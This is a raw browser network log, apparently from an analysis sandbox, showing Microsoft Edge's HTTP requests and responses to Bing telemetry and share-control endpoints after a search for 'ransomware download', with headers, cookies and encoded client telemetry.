cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-length: 373
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a366cb38408f90faee9d6b772a02
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-ogMxXJB5WztNh2926/OJG7MKgubyL9DYULPHJE6aDAA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 3A2110993DC1431D83D5DB81C8D944F9 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:31:50Z
date: Thu, 29 Feb 2024 15:31:50 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:50 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315594
-
GEThttps://www.bing.com/sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable&msedge.exeRemote address:92.123.128.152:443RequestGET /sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable& HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9BE0E4E6CF03484FAA53928675F508CD Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b3155bb
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707153%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707189%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220707225%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220707430%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22CIBInfo%22%2C%22CustomData%22%3A%22%7B%5C%22version%5C%22%3A%5C%221.1600.1%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707851%2C%22Name%22%3A%22CIB%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707950%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707153%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707189%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220707225%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220707430%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22CIBInfo%22%2C%22CustomData%22%3A%22%7B%5C%22version%5C%22%3A%5C%221.1600.1%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707851%2C%22Name%22%3A%22CIB%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707950%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 247460AB93ED437EB8200F44FA14708A Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b3155ba
-
GEThttps://www.bing.com/welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903msedge.exeRemote address:92.123.128.152:443RequestGET /welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FF3D550CCC00435F88D3C82029FCD394 Ref B: LTSEDGE1614 Ref C: 2024-02-29T15:31:50Z
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315607
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BC6C0C1541114706B8424E1B8BAA5F4A Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:50Z
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315606
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2E0FE7344F6545BCA45C9EF4461F14CA Ref B: LON04EDGE1020 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b31560d
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 329
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F63F19D8E8EF46309F107CDA7DA06381 Ref B: LON04EDGE1219 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b31560e
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 415
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
